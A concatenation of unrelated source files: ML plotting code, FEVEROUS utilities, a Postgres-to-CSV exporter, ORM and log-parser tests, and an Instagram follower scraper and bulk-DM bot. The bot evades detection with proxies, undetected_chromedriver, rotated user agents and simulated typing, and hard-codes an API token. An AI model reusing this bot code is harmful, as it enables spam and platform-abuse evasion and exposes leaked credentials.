        ax.set_ylabel(plth.format_problem_and_metric(dataset, metric, model))

    ax.set_title(str(abs(batch_size * acc_step)), pad=2)

    if not yaxis_labels:
        ax.tick_params(labelleft=False, which="both")

    if legend:
        # Deduplicate legend entries and pick a corner that does not cover
        # the curves for the given problem/metric combination.
        handles, labels = ax.get_legend_handles_labels()
        by_label = dict(zip(labels, handles))
        loc = "lower right"
        if model == "transformer_xl" or model == "transformer_encoder":
            loc = "upper right"
        if metric == h.TRAIN_LOSS:
            if dataset != "mnist":
                loc = "upper right"
            else:
                loc = "lower right"
        legend = ax.legend(
            by_label.values(), by_label.keys(), fontsize=6, markerscale=6, loc=loc
        )
        [line.set_linewidth(1) for line in legend.get_lines()]

    plth.save_data(
        args,
        model,
        dataset,
        {
            "adam": adam_data,
            "sgd": sgd_data,
            "adam_nm": adam_nm_data,
            "sgd_m": sgd_m_data,
        },
        batch_size,
    )
def plot_best_run(
    ax,
    label,
    data,
    metric,
    hyperparam=h.K_SS,
    iteration_limit=-1,
    num_iterations_per_epoch=-1,
):
    """Plot mean +/- min/max band over seeds for the best-hyperparameter runs
    of one optimizer (`label` selects color/linestyle via LABEL_TO_STYLE).

    `data` is the summary DataFrame for that optimizer; per-run histories are
    fetched with h.get_run. When `num_iterations_per_epoch` > 0 the x axis is
    converted from epochs to iterations.
    """
    ids = list(data[h.K_ID])
    color = LABEL_TO_STYLE[label]["color"]

    # Training-loss histories are always needed: the best hyperparameter is
    # selected on training loss even when another metric is plotted.
    runs_metric = None
    runs_training_loss = {}
    for run_id in ids:
        run = h.get_run(run_id, data_type=h.TRAIN_LOSS)
        if iteration_limit > 0:
            run = run[run.index <= iteration_limit]
        runs_training_loss[run_id] = run

    if metric != h.TRAIN_LOSS:
        runs_metric = {}
        for run_id in ids:
            run = h.get_run(run_id, data_type=metric)
            # Re-align the logged steps: keep the _step == 3 row as the start
            # and shift the remaining rows' step column by one.
            # NOTE(review): the [0, 1, 0] offset assumes a fixed 3-column
            # layout with _step in the middle — confirm against h.get_run.
            begin = run.loc[run["_step"] == 3]
            run = pandas.concat([begin, run.iloc[1:, :] - [0, 1, 0]])
            if iteration_limit > 0:
                run = run[run.index <= iteration_limit]
            runs_metric[run_id] = run

    if len(ids) > 0:
        hyperparam, run_data, time_steps, _ = gen_best_runs_for_metric(
            runs_training_loss,
            data,
            metric,
            actual_metric_data=runs_metric,
            hyperparam=hyperparam,
        )
        max_loss, mean_loss, min_loss = plth.get_data_summary_for_metric(
            metric, run_data, time_steps
        )
        # Shift the time axis left by 2 logged steps before scaling.
        i = 2
        time_steps = [time_step - i for time_step in time_steps]
        if num_iterations_per_epoch > 0:
            # Convert epochs to iterations, leaving the first point (1) as-is.
            for i in range(len(time_steps)):
                if time_steps[i] != 1:
                    time_steps[i] = num_iterations_per_epoch * time_steps[i]
        ax.plot(
            time_steps,
            mean_loss,
            linestyle=plth.LABEL_TO_STYLE[label]["linestyle"],
            color=color,
            label=label + " " + plth.latex_sci_notation(hyperparam),
            markersize=1,
        )
        # Shaded band between the min and max over seeds.
        ax.fill_between(time_steps, min_loss, max_loss, color=color, alpha=0.2)
def gen_best_runs_for_metric(
    run_for_ids, summary_data, metric, hyperparam=h.K_SS, actual_metric_data=None
):
    """Pick the best hyperparameter value (by training loss over
    `run_for_ids`) and return plth.prepare_best_runs for the seeds trained
    at that value.

    `actual_metric_data`, when given, supplies the per-run histories of the
    metric actually plotted; otherwise the training-loss histories are used.
    Runs with 3 or fewer logged points are discarded as incomplete.
    """
    step_sizes = list(summary_data[hyperparam].unique())
    step_to_use = plth.select_best_stepsize(
        hyperparam, run_for_ids, step_sizes, summary_data
    )
    curr_id = []
    # Collect every run (up to 5 seeds) trained at the selected value.
    for seed in range(5):
        df_row = summary_data.loc[
            (summary_data[h.SEED] == seed) & (summary_data[hyperparam] == step_to_use)
        ]
        if df_row[h.K_ID].size != 0:
            for i in range(df_row[h.K_ID].size):
                run_id = df_row[h.K_ID].iloc[i]
                if len(run_for_ids[run_id]) > 3:
                    curr_id.append(run_id)
    data_to_use = actual_metric_data if actual_metric_data is not None else run_for_ids
    return plth.prepare_best_runs(curr_id, metric, data_to_use, step_to_use)
def gen_step_size_vs_metric_plot(
    args,
    model,
    dataset,
    ax,
    batch_size=-1,
    acc_step=-1,
    metric=h.TRAIN_LOSS,
    legend=False,
    yaxis_labels=False,
    iteration_limit=-1,
):
    """Plot final metric value versus step size for SGD and Adam on `ax`,
    with a horizontal line at the initial loss marking divergence, then dump
    the underlying data via plth.save_data.
    """
    big_batch = True
    full_batch = False

    (adam_data, sgd_data, adam_nm_data, sgd_m_data,) = data_selection.select_runs(
        acc_step, batch_size, big_batch, dataset, full_batch, metric, model
    )

    max_ss, min_ss, unique_ss = data_selection.find_step_size_range(
        acc_step, batch_size, big_batch, dataset, full_batch, metric, model
    )

    adam_ids = list(adam_data[h.K_ID])

    # For loss-like metrics, estimate the value at initialization from the
    # best Adam runs; anything at/above it is treated as diverged.
    max_start_loss = None
    if not (metric == h.TRAIN_ACC or metric == h.F_ONE or metric == h.EXACT_MATCH):
        runs_for_ids_adam = plth.get_runs_for_ids_and_metric(adam_ids, metric)
        runs_for_ids_adam_training_loss = plth.get_runs_for_ids_and_metric(
            adam_ids, h.TRAIN_LOSS
        )
        _, _, _, max_start_loss = gen_best_runs_for_metric(
            runs_for_ids_adam_training_loss,
            adam_data,
            metric,
            actual_metric_data=runs_for_ids_adam,
        )

    iteration_limit, _ = plth.iter_limit_and_per_epoch(
        acc_step, batch_size, big_batch, dataset, iteration_limit, model
    )

    if max_start_loss:
        ax.axhline(
            y=max_start_loss,
            color=plth.COLOR_INITIAL_VALUE,
            linestyle="-",
            label=plth.LABEL_INITIAL_VALUE,
        )
    else:
        # Accuracy-like metrics: use 0 as the "diverged" reference value.
        max_start_loss = 0

    plot_ss_vs_metric(
        sgd_data,
        ax,
        LABEL_SGD,
        metric,
        unique_ss,
        max_start_loss,
        iteration_limit=iteration_limit,
    )
    plot_ss_vs_metric(
        adam_data,
        ax,
        LABEL_ADAM,
        metric,
        unique_ss,
        max_start_loss,
        iteration_limit=iteration_limit,
    )

    ax.set_title(str(abs(batch_size * acc_step)), pad=2)
    ax.set_xscale("log")
    if metric not in [h.TRAIN_ACC, h.F_ONE]:
        ax.set_yscale("log")

    if metric == h.TRAIN_LOSS:
        tag_yaxis(ax, increment=1)
    else:
        ax.set_ylim(0, 105)

    ax.set_xlim(min_ss, max_ss)

    if yaxis_labels:
        ax.set_ylabel(plth.format_problem_and_metric(dataset, metric, model))
    else:
        # Interior panels share the y axis: strip all tick labels.
        ax.set_yticklabels([], minor=False)
        ax.set_yticklabels([], minor=True)
        ax.set_yticks([], minor=True)

    # if metric != h.TRAIN_PPL:
    #     ax.yaxis.set_major_locator(plt.MaxNLocator(5))

    if legend:
        plth.make_legend(ax)

    plth.save_data(
        args,
        model,
        dataset,
        {
            "adam": adam_data,
            "sgd": sgd_data,
            "adam_nm": adam_nm_data,
            "sgd_m": sgd_m_data,
        },
        batch_size,
    )
def plot_ss_vs_metric(
    data, ax, label, metric, unique_ss, max_start_loss, iteration_limit=-1
):
    """Scatter/error-bar the end-of-run metric for one optimizer at each step
    size in `unique_ss`.

    Step sizes whose mean final value is no better than `max_start_loss`
    (within 0.01) are drawn as hollow markers at the divergence line instead
    of as error bars.
    """
    color = LABEL_TO_STYLE[label]["color"]
    steps, mean, min_val, max_val, diverged = [], [], [], [], []
    # For accuracy-like metrics, larger values are better; the divergence
    # comparison below is flipped accordingly.
    bigger_better = (
        metric == h.TRAIN_ACC or metric == h.F_ONE or metric == h.EXACT_MATCH
    )
    for ss in sorted(unique_ss):
        non_diverge = data[(data[h.K_SS] == ss)]
        if len(non_diverge) != 0:
            ids = list(non_diverge[h.K_ID])
            vals = get_value_at_end_of_run_for_ids(ids, metric, iteration_limit)
            # Any NaN among the seeds means the run blew up: treat the whole
            # step size as diverged.
            if np.isnan(vals).any():
                mean_loss = math.inf
            else:
                mean_loss = vals.mean()
            if (not bigger_better and (mean_loss >= max_start_loss - 0.01)) or (
                bigger_better and (mean_loss <= max_start_loss + 0.01)
            ):
                # Hollow marker pinned at the initial-value line.
                ax.scatter(
                    ss,
                    max_start_loss,
                    facecolors="none",
                    linewidth=1,
                    edgecolors=color,
                    s=2,
                )
                diverged.append(ss)
            else:
                # Asymmetric error bar: distances from the mean to the
                # (clipped) max and to the min across seeds.
                max_loss = vals.max()
                if not bigger_better:
                    max_loss = min(max_loss, max_start_loss)
                max_loss = max_loss - mean_loss
                min_loss = mean_loss - vals.min()
                steps.append(ss)
                mean.append(mean_loss)
                min_val.append(min_loss)
                max_val.append(max_loss)

    plth.common_ss_vs_metric_errorbar_and_points(
        ax, diverged, label, max_start_loss, max_val, mean, min_val, steps
    )
def main(args):
    """Build a 1xN grid of per-dataset plots (best-run or metric-vs-step-size).

    Only supports the big-batch, non-full-batch configuration; an epoch-based
    iteration limit is derived from dataset/batch sizes when several datasets
    are plotted.
    """
    assert (not args.full_batch) and args.big_batch
    datasets, models, batch_sizes, acc_steps, length = plth.process_args(args)
    plth.init_plt_style(plt)
    figsize = (
        plth.FIGSIZE_4x1_short if args.plot_type == BEST_PLOT else plth.FIGSIZE_4x1
    )
    fig, axes = plt.subplots(1, length, figsize=figsize)
    if args.big_batch and len(datasets) > 1:
        # Derive a common iteration budget from one reference dataset.
        # NOTE(review): the index choice (2 vs 1) and multipliers (200/80 epochs)
        # appear tuned to a specific experiment layout — confirm before reuse.
        if datasets[0] != "squad":
            key = datasets[2]
            if models[2] == "transformer_encoder":
                key = datasets[2] + "_" + models[2]
            num_iterations_per_epoch = dataset_sizes[key] // abs(
                batch_sizes[2] * acc_steps[2]
            )
            iteration_limit = 200 * num_iterations_per_epoch
        else:
            key = datasets[1]
            num_iterations_per_epoch = dataset_sizes[key] // abs(
                batch_sizes[1] * acc_steps[1]
            )
            iteration_limit = 80 * num_iterations_per_epoch
    else:
        iteration_limit = -1  # no limit
    for i in range(length):
        y = i // 3
        x = i % 3
        print(x, y, i)
        metric = plth.select_metric(args.metric, datasets[i])
        if args.plot_type == BEST_PLOT:
            gen_best_run_plot(
                args,
                models[i],
                datasets[i],
                axes[i],
                batch_size=batch_sizes[i],
                acc_step=acc_steps[i],
                metric=metric,
                yaxis_labels=i == 0,
                iteration_limit=iteration_limit,
            )
        if args.plot_type == METRIC_VS_SS:
            gen_step_size_vs_metric_plot(
                args,
                models[i],
                datasets[i],
                axes[i],
                batch_size=batch_sizes[i],
                acc_step=acc_steps[i],
                metric=metric,
                legend=False,
                yaxis_labels=i == 0,
                iteration_limit=iteration_limit,
            )
    if args.plot_type == BEST_PLOT and args.big_batch:
        # Harmonize axis limits across the subplots for the best-run layout.
        x_lim_max = axes[0].get_xlim()[1]
        if models[0] == "bert_base_pretrained":
            x_lim_max = 450
        y_lim = [math.inf, -math.inf]
        for i in range(length):
            y_lim = [
                min(y_lim[0], axes[i].get_ylim()[0]),
                max(y_lim[1], axes[i].get_ylim()[1]),
            ]
        for i in range(length):
            curr = axes[i].get_xlim()
            axes[i].set_xlim(curr[0], x_lim_max)
            axes[i].set_ylim(y_lim[0], min(y_lim[1], 10 ** 7))
    fplt.normalize_y_axis(*axes)
    fplt.hide_frame(*axes)
    fig.tight_layout(pad=0.5)
    plth.save_figure(args, datasets, models, plt)
# Entry point: parse CLI arguments with the shared plotting-helper parser.
if __name__ == "__main__":
    main(plth.cli().parse_args())
| 2.515625 | 3 |
src/feverous/utils/util.py | creisle/FEVEROUS | 42 | 12765024 | import json
import sys
import os
import jsonlines
import traceback
import logging
from tqdm import tqdm
import pickle
import itertools
import linecache
import html
import re
ALL_TITLES = {}
class WikiElement(object):
    """Abstract interface for wiki page elements; presumably implemented by
    concrete element classes (tables, cells, sentences, ...) elsewhere."""
    def get_ids(self) -> list:
        """Return a list of all ids in this element."""
        pass
    def get_id(self) ->str:
        """Return the specific id of this element."""
    def id_repr(self) -> str:
        """Return a string representation of all ids in this element."""
        pass
    def __str__(self) -> str:
        """Return a string representation of the element's content."""
        pass
def process_text(text):
    """Normalize a raw text snippet by trimming surrounding whitespace."""
    trimmed = text.strip()
    return trimmed
def calculate_title_to_json_map(input_path):
    """Map every wiki page title to the (file, line) where its record is stored."""
    from utils.wiki_processor import WikiDataProcessor

    processor = WikiDataProcessor(os.path.join(input_path))
    # The processor exposes its current position while iterating, so each
    # page can be tagged with the file/line it was read from.
    return {
        page.title.content: (processor.current_file, processor.current_line)
        for page in processor
    }
class Reader:
    """Base file reader; subclasses override ``process`` to parse the handle."""

    def __init__(self, encoding="utf-8"):
        # Encoding used when opening files in ``read``.
        self.enc = encoding

    def read(self, file):
        """Open ``file`` with the configured encoding and parse it."""
        with open(file, "r", encoding=self.enc) as handle:
            return self.process(handle)

    def process(self, f):
        """Parse an open file handle; no-op in the base class."""
        pass
class JSONReader(Reader):
    """Reader that parses the whole file as one JSON document."""

    def process(self, fp):
        """Deserialize the open handle's entire content with ``json.load``."""
        return json.load(fp)
class JSONLineReader(Reader):
    """Reader for newline-delimited JSON (one JSON document per line)."""

    def process(self, fp):
        """Return a list with one parsed object per non-blank line.

        Iterates the handle lazily instead of materializing ``readlines()``,
        and skips blank lines (e.g. a trailing newline at EOF), which would
        previously have raised a JSON decode error.
        """
        return [json.loads(line) for line in fp if line.strip()]
| 2.6875 | 3 |
model_building_tools/gen_classes/psql_to_csv.py | jdailey/EnergyPATHWAYS | 26 | 12765025 | <reponame>jdailey/EnergyPATHWAYS<gh_stars>10-100
#!/usr/bin/env python
from __future__ import print_function
import click
import os
import pandas as pd
from postgres import Tables_to_ignore, mkdirs, PostgresDatabase
@click.command()
@click.option('--dbname', '-d', default='pathways',
              help='PostgreSQL database name (default="pathways")')
@click.option('--db-dir', '-D', default=None,
              help='''Directory under which to store CSV "tables". Defaults to the postgres database name with ".db" extension in the current directory.''')
@click.option('--host', '-h', default='localhost',
              help='Host running PostgreSQL (default="localhost")')
@click.option('--user', '-u', default='postgres',
              help='PostgreSQL user name (default="postgres")')
@click.option('--password', '-p', default='',
              help='PostreSQL password (default="")')
@click.option('--limit', '-l', type=int, default=0,
              help='Limit the number of rows read (useful for debugging; default=0, which means unlimited)')
@click.option('--tables', '-t', default='',
              help='''A comma-delimited list of table names to process rather than the default,
              which is to process all tables.''')
@click.option('--ids/--no-ids', default=False,
              help='''
Indicates whether to include database ids in the data, and thus, in the \
generated class, which reads the CSV headers. This option exists to facilitate \
integration, and will be removed for the final production run.''')
@click.option('--shapes/--no-shapes', default=True,
              help='Whether to copy the ShapeData directory to the merged database. (Default is --shapes)')
def main(dbname, db_dir, host, user, password, limit, tables, ids, shapes):
    """Export a PostgreSQL pathways database to a directory of CSV 'tables'."""
    db = PostgresDatabase(host=host, dbname=dbname, user=user, password=password, cache_data=False)
    db_dir = db_dir or dbname + '.db'
    print("Creating CSV database '%s'" % db_dir)
    mkdirs(db_dir)
    mkdirs(os.path.join(db_dir, 'ids'))
    mkdirs(os.path.join(db_dir, 'ShapeData'))
    db.load_text_mappings()    # to replace ids with strings
    # Geography tables are handled elsewhere, so skip them in addition to
    # the shared ignore list.
    tables_to_skip = Tables_to_ignore + ['GeographyIntersection', 'GeographyIntersectionData', 'Geographies', 'GeographyMapKeys', 'GeographiesData']
    table_names = (tables and tables.split(',')) or [name for name in db.get_table_names() if name not in tables_to_skip]
    table_objs = [db.get_table(name) for name in table_names]
    if limit:
        print("\n*** Limiting reads to %d rows per table! ***\n" % limit)
    # Helper: drop the given columns from a DataFrame in place.
    def _drop(df, *cols):
        df.drop(list(cols), axis=1, inplace=True)
    for tbl in table_objs:
        if not shapes and tbl.name == 'ShapesData':
            continue
        tbl.load_all(limit=limit)
        # One-off patches: synthesize string names for link tables and drop
        # integer ids that the CSV schema no longer carries.
        df = tbl.data
        if tbl.name == 'DemandServiceLink':
            df['name'] = df.id.map(lambda id: 'dem_svc_link_{}'.format(id))
        elif tbl.name == 'DemandTechsServiceLink':
            df['name'] = df.id.map(lambda id: 'dem_tech_svc_link_{}'.format(id))
            _drop(df, 'id')
        elif tbl.name == 'DemandTechsServiceLinkData':
            df['parent'] = df.parent_id.map(lambda id: 'dem_tech_svc_link_{}'.format(id))
            _drop(df, 'id', 'parent_id')
        elif tbl.name == 'CurrenciesConversion':
            _drop(df, 'id')
        elif tbl.name == 'BlendNodeInputsData':
            _drop(df, 'id')
        elif tbl.name == 'DispatchTransmissionHurdleRate' or tbl.name == 'DispatchTransmissionLosses':
            _drop(df, 'id')
        tbl.to_csv(db_dir, save_ids=ids)
    # if False:
    #     # Merge generated DemandTechsServiceLink* to form DemandServiceLinkData for 3-way merge
    #     dtsl = pd.read_csv(os.path.join(db_dir, 'DemandTechsServiceLink.csv'), index_col=None)
    #     dtsl_data = pd.read_csv(os.path.join(db_dir, 'DemandTechsServiceLinkData.csv'), index_col=None)
    #     merged = pd.merge(dtsl, dtsl_data, left_on='name', right_on='parent', how='left')
    #     merged.drop('parent', axis=1, inplace=True)
    #     merged.rename(index=str, columns={'name': 'old_parent', 'service_link' : 'parent'}, inplace=True)
    #
    #     pathname = os.path.join(db_dir, 'DemandServiceLinkData.csv')
    #     merged.to_csv(pathname, index=None)
    # Save foreign keys so they can be used by CSV database
    foreign_keys_path = os.path.join(db_dir, 'foreign_keys.csv')
    db.save_foreign_keys(foreign_keys_path)
    # Emit a Python module recording which columns had ids mapped to strings.
    filename = 'text_mappings.py'
    print("Writing", filename)
    with open(filename, 'w') as f:
        f.write('MappedCols = {\n')
        for tbl in table_objs:
            cols = tbl.mapped_cols.values()
            if cols:
                f.write('    "{}" : {},\n'.format(tbl.name, cols))
        f.write('}\n')
if __name__ == '__main__':
    main()
| 2.453125 | 2 |
tests/test_backwards.py | arvindanugula/flywheel | 72 | 12765026 | <reponame>arvindanugula/flywheel
""" Test backwards-compatible behavior """
import json
from flywheel import Field, Model
from flywheel.fields.types import TypeDefinition, DictType, STRING
from flywheel.tests import DynamoSystemTest
class JsonType(TypeDefinition):
    """ Simple type that serializes to JSON """
    # Legacy field type: values are stored in DynamoDB as JSON strings.
    data_type = json
    ddb_data_type = STRING
    def coerce(self, value, force):
        """Pass values through unchanged; serialization happens in ddb_dump."""
        return value
    def ddb_dump(self, value):
        """Serialize *value* to a JSON string for storage."""
        return json.dumps(value)
    def ddb_load(self, value):
        """Deserialize a stored JSON string back to a Python value."""
        return json.loads(value)
class OldDict(Model):
    """ Model that uses an old-style json field as a dict store """
    __metadata__ = {
        '_name': 'dict-test',
    }
    # Hash key identifying the item.
    id = Field(hash_key=True)
    # Stored via the legacy JSON-string type; tests later swap this to DictType.
    data = Field(data_type=JsonType())
class TestOldJsonTypes(DynamoSystemTest):
    """ Test the graceful handling of old json-serialized data """
    models = [OldDict]
    def setUp(self):
        """Reset the field to the legacy JSON type before each test."""
        super(TestOldJsonTypes, self).setUp()
        OldDict.meta_.fields['data'].data_type = JsonType()
    def test_migrate_data(self):
        """ Test graceful load of old json-serialized data """
        # Write with the legacy JSON type, then read back with DictType.
        old = OldDict('a', data={'a': 1})
        self.engine.save(old)
        OldDict.meta_.fields['data'].data_type = DictType()
        new = self.engine.scan(OldDict).one()
        self.assertEqual(new.data, old.data)
    def test_resave_old_data(self):
        """ Test the resaving of data that used to be json """
        old = OldDict('a', data={'a': 1})
        self.engine.save(old)
        OldDict.meta_.fields['data'].data_type = DictType()
        new = self.engine.scan(OldDict).one()
        # Mutate and sync without conflict detection, then verify persistence.
        new.data['b'] = 2
        new.sync(raise_on_conflict=False)
        ret = self.engine.scan(OldDict).one()
        self.assertEqual(ret.data, {'a': 1, 'b': 2})
| 2.53125 | 3 |
insights/parsers/tests/test_neutron_server_log.py | lhuett/insights-core | 121 | 12765027 | <gh_stars>100-1000
from insights.parsers.neutron_server_log import NeutronServerLog
from insights.tests import context_wrap
# Sample neutron server log: 5 "Authorization failed" warnings and 3
# "Identity response" lines, matched by the assertions below.
NEUTRON_LOG = """
2016-09-13 05:56:45.155 30586 WARNING keystonemiddleware.auth_token [-] Identity response: {"error": {"message": "Could not find token: b45405915eb44e608885f894028d37b9", "code": 404, "title": "Not Found"}}
2016-09-13 05:56:45.156 30586 WARNING keystonemiddleware.auth_token [-] Authorization failed for token
2016-09-13 06:06:45.884 30588 WARNING keystonemiddleware.auth_token [-] Authorization failed for token
2016-09-13 06:06:45.886 30588 WARNING keystonemiddleware.auth_token [-] Identity response: {"error": {"message": "Could not find token: <PASSWORD>ba1<PASSWORD>", "code": 404, "title": "Not Found"}}
2016-09-13 06:06:45.887 30588 WARNING keystonemiddleware.auth_token [-] Authorization failed for token
2016-09-13 06:06:46.131 30586 WARNING keystonemiddleware.auth_token [-] Authorization failed for token
2016-09-13 06:06:46.131 30586 WARNING keystonemiddleware.auth_token [-] Identity response: {"error": {"message": "Could not find token: <KEY>0", "code": 404, "title": "Not Found"}}
2016-09-13 06:06:46.132 30586 WARNING keystonemiddleware.auth_token [-] Authorization failed for token
""".strip()
def test_server_log():
    """NeutronServerLog.get matches both list-of-substrings and single-string filters."""
    neutron_server = NeutronServerLog(context_wrap(NEUTRON_LOG))
    # A list argument requires all substrings to appear on the same line.
    assert len(neutron_server.get(["WARNING", "Authorization failed for token"])) == 5
    assert len(neutron_server.get(["Identity response:"])) == 3
    assert len(neutron_server.get("Identity response:")) == 3
| 2.25 | 2 |
dm.py | seluciano/instagram-scrapping-server | 1 | 12765028 | from selenium import webdriver
from selenium.webdriver.firefox.firefox_binary import FirefoxBinary
import time,random,names,os,requests,sys
from seleniumwire import webdriver
from random_username.generate import generate_username
from selenium.webdriver.firefox.options import Options
from selenium.webdriver import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.firefox.firefox_binary import FirefoxBinary
from selenium.webdriver.common.proxy import *
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
global DELAYS,CREDS,driver,proxyauth_plugin_path,proxy
import undetected_chromedriver as uc
from pyvirtualdisplay import Display
from selenium import webdriver
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent
# Virtual X display so the browser can run on a headless server.
display = Display(visible=0, size=(800, 600))
display.start()
# Appears unused in this module; kept for compatibility with importers.
CREDS={}
DELAYS={
    "keys_min":50,# per-keystroke delay bounds, in milliseconds (divided by 1000.0)
    "keys_max":200,
    "min":200,# generic action delay bounds, divided by 100.0 before sleeping
    "max":1000,
}
def getProxy():
    """Fetch a random elite US proxy, retrying until a usable protocol comes back.

    NOTE(review): the API token is hard-coded in the URL — consider moving it
    to configuration.
    """
    usable_protocols = ('https', 'socks4', 'socks5')
    url = ('https://api.proxyflow.io/v1/proxy/random'
           '?token=c9997120aae549e43c4b45a3&country=US&anonymity=elite&ssl=true')
    proxy_info = requests.get(url).json()
    while proxy_info['protocol'] not in usable_protocols:
        proxy_info = requests.get(url).json()
    return proxy_info
def agent():
    """Return a randomly chosen desktop-Linux browser user-agent string."""
    user_agents = (
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
        'Mozilla/5.0 (X11; Linux i686; rv:82.0) Gecko/20100101 Firefox/82.0',
        'Mozilla/5.0 (Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0',
        'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:82.0) Gecko/20100101 Firefox/82.0',
        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0',
        'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0',
        'Mozilla/5.0 (X11; Linux i686; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Mozilla/5.0 (Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
    )
    return random.choice(user_agents)
def startDriver():
    """Launch Chrome behind a virtual display and store it in the global ``driver``.

    Bug fix: this function was copied from a class method and still referenced
    ``self`` (``self.proxy``, ``self.agent()``, ``self.driver``), which is
    undefined in a module-level function and raised NameError on every call.
    The driver is now assigned to the module global that openLogin/login/dm
    read, and the user agent comes from the module-level ``agent()`` helper.
    """
    global driver
    print('------ startDriver init')
    from pyvirtualdisplay import Display
    display = Display(visible=0, size=(800, 600))
    display.start()
    opts = webdriver.ChromeOptions()
    opts.binary_location = "/usr/bin/google-chrome"
    opts.add_extension(os.getcwd()+"/Proxy Auto Auth.crx")
    # NOTE(review): the proxy is hard-coded; the old duplicate
    # `--proxy-server={self.proxy}` argument referenced undefined state
    # and has been dropped.
    opts.add_argument("--proxy-server=http://nataly.ltespace.com:15584")
    opts.add_argument("user-agent=%s" % agent())
    opts.add_argument('--disable-gpu')
    # opts.add_argument('--headless')
    opts.add_argument('--no-sandbox')
    capabilities = DesiredCapabilities.CHROME
    driver = webdriver.Chrome(chrome_options=opts, desired_capabilities=capabilities,
                              executable_path=f'{BASE_DIR}/chromedriver')
    print('------ driver started')
def openLogin():
    """Navigate to the Instagram login page.

    Returns True when the username field rendered, False on any failure.
    """
    print('open login')
    try:
        driver.get('https://www.instagram.com/accounts/login/')
        print('login page')
        time.sleep(4)
        # Raises if the login form did not load.
        driver.find_element_by_name("username")
    except:
        return False
    return True
def login(un,pw):
    """Fill and submit the Instagram login form with the given credentials.

    Retries loading the login page until it renders, and sleeps random
    human-like delays between form interactions.
    """
    print('---------- def login init')
    x=openLogin()
    while not x:
        x=openLogin()
    time.sleep(random.randint(DELAYS["min"], DELAYS["max"])/100.0)
    driver.find_element_by_name("username").send_keys(un)
    time.sleep(random.randint(DELAYS["min"], DELAYS["max"])/100.0)
    driver.find_element_by_name("password").send_keys(pw)
    time.sleep(random.randint(DELAYS["min"], DELAYS["max"])/100.0)
    driver.find_element_by_xpath('''//div[contains(text(),"Log In")]''').click()
    # Allow time for the post-login redirect to complete.
    time.sleep(10)
def searchUser(name):
    """Find a profile by name and return its follower link elements.

    Searches Instagram for ``name``, opens the first matching profile, opens
    its followers dialog, scrolls until no new entries load, and returns the
    anchor elements for each follower. Progress is appended to dmlog.txt.
    """
    print('---------- def searchUser init')
    open(os.getcwd()+"/dmlog.txt","a").write('Seraching followers of %s \n' % name)
    driver.get('https://www.instagram.com/accounts/onetap')
    time.sleep(4)
    driver.find_element_by_xpath('''//input[@placeholder='Search']''').send_keys(name)
    time.sleep(2)
    # First result link that is not the Instagram home URL is the profile.
    for i in driver.find_elements_by_xpath('//div/a'):
        link=i.get_attribute('href')
        if link=='https://www.instagram.com/':
            pass
        else:
            profileLink=link
            print(profileLink)
            break
    if profileLink[-1]=="/":
        profileLink=profileLink[:-1]
    driver.get(profileLink)
    time.sleep(5)
    driver.find_element_by_xpath('''//a[@href='/%s/followers/']''' % (profileLink.split("/")[-1])).click()
    time.sleep(5)
    driver.find_elements_by_xpath('//div/ul/div/li')[0].click()
    # Scroll the followers dialog until the list stops growing.
    while 1:
        x=len(driver.find_elements_by_xpath('//div/ul/div/li'))
        for i in range(500):
            try:
                driver.find_elements_by_xpath('//div/ul/div/li')[-1].click()
            except:
                pass
            ActionChains(driver).send_keys(Keys.DOWN).perform()
        y=len(driver.find_elements_by_xpath('//div/ul/div/li'))
        if not y>x:
            break
    print("Found %d Followers"%(len(driver.find_elements_by_xpath('//div/ul/div/li'))))
    open(os.getcwd()+"/dmlog.txt","a").write("Found %d Followers"%(len(driver.find_elements_by_xpath('//div/ul/div/li'))))
    return driver.find_elements_by_xpath('//div/ul/div/li//span/a')
def dm(user,message):
    """Send ``message`` to the profile ``user`` via Instagram's DM dialog.

    Raises Exception("Cant Send Message") when neither a Message nor a Follow
    button is present on the profile. Typing uses per-character random delays.
    """
    print('---------- direct mesasge init')
    driver.get("https://www.instagram.com/"+user)
    time.sleep(5)
    try:
        driver.find_element_by_xpath('''//button[contains(text(),"Message")]''').click()
    except:
        try:
            # NOTE(review): when only a Follow button exists, execution falls
            # through without clicking Message — the later Send step will fail;
            # confirm this is the intended behaviour.
            driver.find_element_by_xpath('''//button[contains(text(),"Follow")]''')
        except:
            print("Cant Send Message")
            open(os.getcwd()+"/dmlog.txt","a").write('Cant send DM to %s \n' % user)
            raise Exception("Cant Send Message")
    time.sleep(5)
    try:
        # Dismiss the "Turn on Notifications" popup if it appears.
        driver.find_element_by_xpath('''//button[contains(text(),"Not Now")]''').click()
    except:
        pass
    time.sleep(2)
    # Type the message one character at a time to mimic a human.
    for i in message:
        driver.find_element_by_xpath('''//textarea[@placeholder='Message...']''').send_keys(i)
        time.sleep(random.randint(DELAYS["keys_min"], DELAYS["keys_max"])/1000.0)
    time.sleep(2)
    driver.find_element_by_xpath('''//button[contains(text(),"Send")]''').click()
    open(os.getcwd()+"/dmlog.txt","a").write('DM send successfully to %s \n' % user)
def getFollowers(name, un='sajith8827', pw='<PASSWORD>'):
    """Log in and return follower link elements for ``name``'s profile.

    The credentials that were hard-coded in the body are now keyword
    parameters with the same defaults, so existing one-argument calls keep
    working while callers can supply their own account.
    NOTE(review): shipping real credentials in source is a security risk —
    move them to environment variables or a config file.
    """
    print('---------- def getFollowers init')
    startDriver()
    login(un, pw)
    return searchUser(name)
def sendDM(user, message, un, pw):
    """Log in as ``un``/``pw`` and send ``message`` to every username in ``user``.

    Returns True when all DMs were attempted, False if any send raised.
    Cleanup: removed the redundant ``un=un`` / ``pw=pw`` self-assignments and
